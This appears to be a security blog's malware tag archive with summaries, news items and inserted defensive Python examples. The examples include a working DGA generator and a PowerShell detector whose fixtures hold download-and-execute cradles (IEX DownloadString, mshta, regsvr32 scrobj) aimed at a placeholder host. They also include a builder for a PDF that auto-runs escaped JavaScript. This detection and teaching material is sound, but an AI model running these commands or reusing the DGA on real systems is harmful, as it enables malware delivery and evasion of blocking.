Tag Archives: malware

Good Read: Domain Generating Algorithm (DGA)

Abstract

A Domain Generating Algorithm (DGA) is a program or subroutine that provides malware with new domains on demand or on the fly. Because the algorithm is seeded with something both sides already know (typically the current date), the infected machine and the operator can each compute the same list of candidate domains without ever exchanging it.

History

Kraken (2008) is the earliest malware family we could find that used a DGA. Later that year, Conficker made the technique a lot more famous.

What’s the use?

DGAs are used because malware that depends on a fixed domain or IP address is quickly blocked, which then hinders operations. So, rather than shipping a new version of the malware or setting everything up again on a new server, the malware switches to a new domain at regular intervals.

A typical example of DGAs in practice is the C&C (command and control) servers of botnets and ransomware. If defenders were able to block these or take them down, they would cut the link between the victims and the threat actor: bots would no longer be able to fetch new instructions, and machines infected with ransomware would be unable to request encryption keys or send user data.

The constant changing of the domain for the C&C server is also called “domain fluxing”. It is sometimes confused with “fast fluxing”, an older technique that keeps a single domain but rapidly rotates the IP addresses behind it, using short DNS TTLs and a pool of compromised hosts much like a DNS load-balancing setup would. A DGA rotates the domain names themselves, so blocking the IP addresses or even a single domain does not help for long.
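To make the mechanism concrete, here is an added example (written for this post, not code from Malwarebytes or from any real malware family) of a minimal date-seeded DGA together with the cheap lexical checks a defender can run over DNS logs. The seed string, the TLD list, the 12-letter label length, the sample date and the scoring thresholds are all assumptions chosen for illustration.

```python
import datetime
import hashlib
import math
import re
from collections import Counter
from typing import Dict, List

# Hypothetical DGA parameters, constructed for this example (not taken from any real family).
TLDS = ["com", "net", "org", "info"]
LABEL_LEN = 12
SAMPLE_DAY = datetime.date(2020, 5, 22)   # constructed sample date for the demo


def generate_domains(seed: str, day: datetime.date, count: int = 10) -> List[str]:
    """Date-seeded DGA: derive `count` candidate domains for `day` from a shared secret.

    Bot and operator both know `seed` and the calendar date, so each computes the
    same list independently; the operator registers one name, the bot tries them
    in order until one resolves. No domain list ever has to ship inside the malware.
    """
    domains = []
    for i in range(count):
        material = f"{seed}|{day.isoformat()}|{i}".encode()
        digest = hashlib.sha256(material).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:LABEL_LEN])
        tld = TLDS[digest[LABEL_LEN] % len(TLDS)]
        domains.append(f"{label}.{tld}")
    return domains


def sinkhole_list(seed: str, start: datetime.date, days: int, count: int = 10) -> List[str]:
    """Defender side: once the seed is recovered by reverse engineering, pre-compute the
    next `days` worth of names so they can be registered (sinkholed) or blocked early."""
    out: List[str] = []
    for n in range(days):
        out.extend(generate_domains(seed, start + datetime.timedelta(days=n), count))
    return out


VOWELS = set("aeiou")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def score_domain(domain: str) -> Dict[str, object]:
    """Cheap lexical triage for a DNS log: pronounceable names have vowels and short
    consonant runs, hash-derived labels usually do not. Scores the second-level
    label only (no public-suffix handling, so 'x.co.uk' is scored on 'co')."""
    parts = domain.lower().rstrip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    run = longest = 0
    for c in label:
        if c.isalpha() and c not in VOWELS:   # 'y' and digits-free consonants extend the run
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    # Thresholds are illustrative assumptions; tune them on your own traffic.
    suspicious = len(label) >= 8 and (vowel_ratio < 0.2 or longest >= 5)
    return {
        "label": label,
        "entropy": round(shannon_entropy(label), 2),
        "vowel_ratio": round(vowel_ratio, 2),
        "longest_consonant_run": longest,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for d in generate_domains("example-seed", SAMPLE_DAY, 5) + ["google.com", "www.malwarebytes.com"]:
        print(d, score_domain(d))
```

The same generate_domains function serves both sides: the operator registers one of today's names in advance, the bot walks the list until one resolves, and a defender who has recovered the seed can use sinkhole_list to register or block the coming days' names before the operator does. The lexical scorer only looks at the second-level label and will also flag legitimate but odd-looking names, so treat it as a triage signal to combine with allow-lists and NXDOMAIN counts, not as a verdict.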

Read more in

https://blog.malwarebytes.com/security-world/2016/12/explained-domain-generating-algorithm/

Guide of Fileless Malware and Attack Techniques

Abstract

This is a research report into all aspects of fileless attack malware. It gives the reader concise information on what a fileless malware threat is, how it infiltrates a machine, how it moves through a system, and how to prevent attacks of this kind.

The report also highlights why fileless attacks are a favourite among attackers in today’s environment. It explores the stealth and precision of fileless malware and how it abuses built-in system tools and features (for example PowerShell, WMI and the registry) instead of writing an executable to disk where file-based antivirus would see it.

This report was initially intended to be a supportive document to a practical demonstration of Fileless Attack Malware. However, it was not possible in the time allotted to source a fileless malware threat to explore, modify, test or run. As a result, the author investigated the complete theoretical journey of Fileless Attack Malware.
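Because fileless tooling leaves little on disk, the most useful artefacts are usually process-creation command lines (Sysmon Event ID 1, Windows Security event 4688) and PowerShell script-block logs. The following added example, not taken from the report above, scores such command lines: it decodes PowerShell’s -EncodedCommand payload (base64 over UTF-16LE text) and then looks for download cradles, in-memory execution, stealth flags and script-host LOLBins in both the raw line and the decoded text. The sample command lines are constructed, example.invalid is a placeholder host, and the indicator list and scoring rule are assumptions to be tuned against your own telemetry.

```python
import base64
import re
from typing import Dict, List, Optional

# Spellings PowerShell accepts for -EncodedCommand, followed by a base64 token.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicator families (assumed list, extend from your own telemetry). Each regex is run over
# the raw command line plus whatever the encoded command decodes to.
INDICATORS = {
    "encoded_command": ENC_RE,
    "stealth_flags": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b"
        r"|-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
        r"|Start-BitsTransfer|certutil(?:\.exe)?\b.*-urlcache", re.I),
    "in_memory_exec": re.compile(
        r"\bIEX\b|Invoke-Expression|FromBase64String|Reflection\.Assembly|Add-Type", re.I),
    "lolbin_script_host": re.compile(
        r"\bmshta(?:\.exe)?\b|\bregsvr32(?:\.exe)?\b.*\bscrobj|\brundll32(?:\.exe)?\b.*javascript:"
        r"|\bwmic(?:\.exe)?\b.*/format:", re.I),
    "registry_payload": re.compile(r"Get-ItemProperty|HK(?:CU|LM):\\|\breg(?:\.exe)?\s+query", re.I),
}
STRONG = {"download_cradle", "in_memory_exec", "lolbin_script_host"}   # one hit is enough


def decode_encoded_command(line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, '<undecodable>' if the token is not
    valid base64/UTF-16LE, or None when the line carries no encoded command."""
    m = ENC_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def analyze_command_line(line: str) -> Dict[str, object]:
    decoded = decode_encoded_command(line)
    haystack = line if decoded is None else line + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    suspicious = len(hits) >= 2 or bool(STRONG & set(hits))
    return {"decoded": decoded, "indicators": hits, "suspicious": suspicious}


def encode_ps(script: str) -> str:
    """How -EncodedCommand payloads are built: base64 over the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines in the shape of Sysmon Event ID 1 / Security 4688 fields.
# example.invalid is a placeholder host; none of this is real telemetry.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_LINE = f"powershell.exe -nop -w hidden -enc {encode_ps(CRADLE)}"
ADMIN_LINE = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"
MSHTA_LINE = 'mshta.exe javascript:a=GetObject("script:http://example.invalid/x.sct").Exec();close();'
REGSVR32_LINE = "regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll"
SVCHOST_LINE = r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"
SAMPLE_LOGS: List[str] = [ENCODED_LINE, ADMIN_LINE, MSHTA_LINE, REGSVR32_LINE, SVCHOST_LINE]

if __name__ == "__main__":
    for entry in SAMPLE_LOGS:
        result = analyze_command_line(entry)
        print(("ALERT " if result["suspicious"] else "      ") + entry[:60], result["indicators"])
```

The admin line scores a single weak indicator (the execution-policy bypass that many legitimate scheduled scripts use) and stays below the alert line, while the encoded cradle is flagged on four families and the mshta and regsvr32 lines on the strong LOLBin family alone. Decoding the base64 before matching is the important step: without it the IEX and DownloadString indicators in the first line are invisible.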

Read More in

https://ukdiss.com/examples/fileless-malware-attack-techniques.php

Fileless malware attacks explained (with examples)

https://www.comparitech.com/blog/information-security/fileless-malware-attacks/

Learn how malicious PDFs can be used to target you

Abstract

In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat.

Most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document. One of the easiest and most powerful ways to customize PDF files is by using JavaScript.

The PDF object structure can embed JavaScript objects, and that script can in turn contact remote servers. Read more in

https://www.sentinelone.com/blog/malicious-pdfs-revealing-techniques-behind-attacks/
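As an added example (not code from SentinelOne’s post), the script below builds a small constructed PDF that chains the catalog’s /OpenAction to a JavaScript action, hides the action’s dictionary names with the #xx name escapes PDF syntax permits (/J#53 is the same name as /JS) and stores the script in a FlateDecode stream. It then scans the file the way a triage tool would: objects are split out, escaped names normalised, compressed streams inflated, and both dictionary keys and stream contents checked. The sample document, the list of risky names, their weights and the JavaScript hints are assumptions for illustration; real-world triage would also handle object streams, cross-reference streams and the other filters.

```python
import re
import zlib
from typing import Dict

# Dictionary names that let a PDF run code, trigger actions or reach out; assumed list.
RISKY_NAME_RE = re.compile(
    rb"/(?:JS|JavaScript|OpenAction|AA|Launch|AcroForm|XFA|EmbeddedFile|URI|RichMedia|ObjStm)(?![A-Za-z])")
WEIGHTS = {"/JS": 3, "/JavaScript": 3, "/Launch": 3, "/OpenAction": 2, "/AA": 2}   # anything else: 1
JS_HINT_RE = re.compile(rb"\b(?:eval|unescape|String\.fromCharCode|app\.|this\.exportDataObject|util\.printf)")
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
NAME_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")   # PDF name escape: /J#53 is the same name as /JS


def scan_pdf(data: bytes) -> Dict[int, Dict[str, object]]:
    """Walk every 'N G obj ... endobj' body: normalise escaped names, inflate FlateDecode
    streams, and record risky names and JavaScript-looking content per object."""
    report: Dict[int, Dict[str, object]] = {}
    for m in OBJ_RE.finditer(data):
        num, body = int(m.group(1)), m.group(3)
        sm = STREAM_RE.search(body)
        dict_part = body[:sm.start()] if sm else body
        dict_part = NAME_ESC_RE.sub(lambda e: bytes([int(e.group(1), 16)]), dict_part)
        names = {n.decode() for n in RISKY_NAME_RE.findall(dict_part)}
        compressed = decode_error = js_hints = False
        if sm:
            raw = sm.group(1)
            if b"/FlateDecode" in dict_part:
                compressed = True
                try:
                    raw = zlib.decompress(raw)
                except zlib.error:
                    decode_error = True          # broken or non-standard stream: inspect by hand
            js_hints = JS_HINT_RE.search(raw) is not None
            # Object streams (/ObjStm) carry whole dictionaries inside the stream body.
            names |= {n.decode() for n in RISKY_NAME_RE.findall(raw)}
        report[num] = {"names": sorted(names), "compressed": compressed,
                       "decode_error": decode_error, "js_hints": js_hints}
    return report


def risk_score(report: Dict[int, Dict[str, object]]) -> int:
    score = 0
    for entry in report.values():
        score += sum(WEIGHTS.get(n, 1) for n in entry["names"])
        score += 2 if entry["js_hints"] else 0
    return score


def build_sample_pdf() -> bytes:
    """Constructed test document (no xref table, so strict readers would reject it):
    the catalog's /OpenAction points at a JavaScript action whose names are #-escaped and
    whose script lives in a compressed stream."""
    script = b"app.alert('constructed sample'); var s = unescape('%41%42');"
    packed = zlib.compress(script)
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n",
        b"4 0 obj\n<< /S /Java#53cript /J#53 5 0 R >>\nendobj\n",
        b"5 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed)
        + packed + b"\nendstream\nendobj\n",
    ]
    return b"%PDF-1.7\n" + b"".join(objs) + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    rep = scan_pdf(build_sample_pdf())
    for num, entry in rep.items():
        print(num, entry)
    print("risk score:", risk_score(rep))
```

A plain string search for “/JavaScript” would miss object 4 entirely because of the #53 escapes, and a search that does not inflate streams would miss the script in object 5; both tricks are cheap for an attacker, so a scanner needs to undo them before matching. Whether a given /OpenAction or /AcroForm is malicious still needs a human or a sandbox, but the per-object report tells you where to look first.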

Cyber Security headlines of the week

Windows malware opens RDP ports on PCs for future remote access

Security researchers say they have spotted a new version of the Sarwent malware that opens RDP (Remote Desktop Protocol) ports on infected computers so that attackers can gain hands-on access to the infected hosts.

Researchers from SentinelOne, who spotted this new version, believe the Sarwent operators are most likely preparing to sell access to these systems on the cybercrime underworld, a common method of monetizing RDP-capable hosts.

THE SARWENT MALWARE

The Sarwent malware is a lesser-known backdoor trojan that has been around since 2018. In its previous versions, the malware contained a limited set of functionality, such as having the ability to download and install other malware on compromised computers. Read more in

Easyjet Hacks: it wasn’t just a few credit cards: Entire travel itineraries were stolen by hackers

Victims of the Easyjet hack are now being told their entire travel itineraries were accessed by hackers who helped themselves to nine million people’s personal details stored by the budget airline.

As reported earlier this week, the data was stolen from the airline between October 2019 and January 2020. Easyjet kept quiet about the hack until mid-May, though around 2,200 people whose credit card details were stolen during the cyber-raid were told of this in early April, months after the attack.

Read more in: https://www.theregister.co.uk/2020/05/22/easyjet_hack_victim_notification/

Ransomware tries to evade antivirus by hiding in a virtual machine on infected systems

With antivirus tools increasingly wise to common infection tricks, one group of extortionists has taken the unusual step of stashing their ransomware inside its own virtual machine.

According to Vikas Singh, Gabor Szappanos, and Mark Loman at Sophos, criminals have slotted the file-scrambling Ragnar Locker nasty into a virtual machine running a variant of Windows XP, called MicroXP. Then, once the crooks have infiltrated a victim’s network and gained administrative access – typically via a weak RDP box or through a compromised managed services provider – they download the VM, along with Oracle’s VirtualBox hypervisor to run it, on each machine they can get into.

Read more in https://www.theregister.co.uk/2020/05/22/byovm_ransomware_in_virtualbox/

Twitter Bots: Roughly half the Twitter accounts pushing to ‘reopen America’ are bots.

As parts of the US have lifted shutdown orders during the COVID-19 pandemic, there’s been a fierce argument online about the risks and benefits of reopening. New research suggests that bots have been dominating that debate.

Read more in https://www.businessinsider.com/nearly-half-of-reopen-america-twitter-accounts-are-bots-report-2020-5?r=US&IR=T

Good Read: Top cybersecurity facts, figures and statistics for 2020

9 key cybersecurity statistics at-a-glance

  • 94% of malware is delivered via email
  • Phishing attacks account for more than 80% of reported security incidents
  • $17,700 is lost every minute due to phishing attacks
  • 60% of breaches involved vulnerabilities for which a patch was available but not applied
  • 63% of companies said their data was potentially compromised within the last twelve months due to a hardware- or silicon-level security breach
  • Attacks on IoT devices tripled in the first half of 2019
  • Fileless attacks grew by 256% over the first half of 2019
  • Data breaches cost enterprises an average of $3.92 million
  • 40% of IT leaders say cybersecurity jobs are the most difficult to fill

Read more in

https://www.csoonline.com/article/3153707/top-cybersecurity-facts-figures-and-statistics.html